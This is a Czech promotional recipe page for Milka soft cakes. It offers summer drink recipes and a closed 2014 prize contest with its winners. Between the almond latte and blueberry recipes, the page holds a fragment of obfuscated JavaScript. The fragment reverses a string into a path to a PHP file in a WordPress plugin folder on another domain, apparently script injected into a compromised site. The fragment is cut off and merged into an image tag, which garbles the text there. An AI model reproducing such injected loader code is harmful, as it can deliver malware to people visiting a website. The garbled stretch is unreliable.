FACESTARReceptySOUTĚŽ UKONČENA! ZAKOUSNI SE DO LÉTA S CHUTÍ! Z TĚCHTO RECEPTŮ BUDETE...

SOUTĚŽ UKONČENA! ZAKOUSNI SE DO LÉTA S CHUTÍ! Z TĚCHTO RECEPTŮ BUDETE NA MĚKKO!

Milka zabrousila do kategorie měkkého pečiva a přináší dvě chutné novinky a recepty na fantastické koktejly.

Milka zabrousila do kategorie měkkého pečiva a přináší dvě chutné novinky a recepty na fantastické koktejly.

Banánový koktejl a softíky Milka Cake&Choc

Ingredience

4 banány
1 litr vychlazeného polotučného mléka

Je to jednodušší, než byste mysleli. Rozmixujeme banány a pomalu do nich přiléváme za stálého mixování mléko. Hotový nápoj servírujte se softíkem Milka Cake&Choc.

and

Melounovo-jahodový shake a softíky Milka ChocoTwist

Ingredience

2 bílé netučné jogurty
250g melounu
250g jahod
1 banán
¼ citrónu

Meloun, jahody a banán očistíme. Nakrájíme na kostky a vypeckujeme. Šťávu z citronu vymačkáme na ovoce a vše i s jogurtem rozmixujeme tyčovým mixérem, až se udělá hladká pěna. Ihned podáváme.
Podávejte se softíkem Milka ChocoTwist.

and

Voňavé mandlové latté a softíky Milka Cake&Choc

Ingredience

2 lžičky rozpustné kávy Jacobs
4 kostky ledu
150 ml mléka
5 kapek mandlového aroma
trochu cukru podle chuti
mandlové vločky na ozdobení (nasekané mandle)

Do mixéru s funkcí drcení ledu dáme všechny přísady (kromě mandlových vloček) a důkladně rozmixujeme. Nalijeme do sklenice a ozdobíme mandlovými vločkami. Nápoj nejvíce chutná se softíkem Milka Cake&Choc.

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandlove_latte_2.jpg“ />

Borůvkové smoothie s karamelovým nádechem a softíky Milka

Ingredience

2 lžičky rozpustné kávy Jacobs
60 ml vroucí vody
170 ml napěněného teplého mléka
150 g borůvek (mražených)

Do vysoké sklenice připravte napěněné teplé mléko. Vedle si připravte kávu, následně ji vlijte do sklenice. Nechte cca 10 minut vychladit v mrazáku nebo v lednici. Spolu s borůvkami nápoj vyšlehejte pomocí tyčového mixéru. Naplňte do dvou sklenic. Hezký dojem udělá ozdobení karamelovým topingem. Ihned konzumujte. Nejlépe je doplníte softíky Milka Cake&Choc a Milka ChocoTwist.

and

Malinová tříšť a softíky Milka

Ingredience

200g malin
led
2l vody
1 svazek máty
Podle chuti třtinový cukr

Rozmixujeme na hrubo maliny s ledem a cukrem, přihodíme lístky natrhané máty a zalijeme vodou. Servírujeme se softíky Milka Cake&Choc a Milka ChocoTwist.

and

Připravte pro své přátele či rodinu léto na měkko, stačí správně odpovědět na soutěžní otázku a být ve správném pořadí. Ve hře je celkem 6 „mega“ dárkových balení pro celou rodinu!

Soutěžní otázka zní: Kolik šťavnatých Softíků najdete v jednom balení?

a) 10
b) 7
c) 5

Nápovědu najdete na www.softikymilka.cz.

Správné odpovědi zasílejte na emailovou adresu soutez@facestar.cz, do pole předmět přidejte heslo Softík Milka, dále nezapomeňte uvést své jméno a příjmení, kontaktní adresu a telefonní spojení. Nezapomeňte a připojte se k nám na facebook a klikněte na To se mi líbí! Budete tak mezi prvními, kdo se dozví o našich soutěžích, sledujte náš Facebook! Vyhrává v pořadí každá 742 správná odpověď! Soutěž probíhá od 17.7. – 7.8. 2014do 24:00h!

Gratulujeme a ceny výhercům posíláme: Filip H., Ivanovice, Aleš W., Ostrava, Alena R., Praha, Lucie S., Tábor, Eva Z., Příbor, Olga R., Blansko.

Související články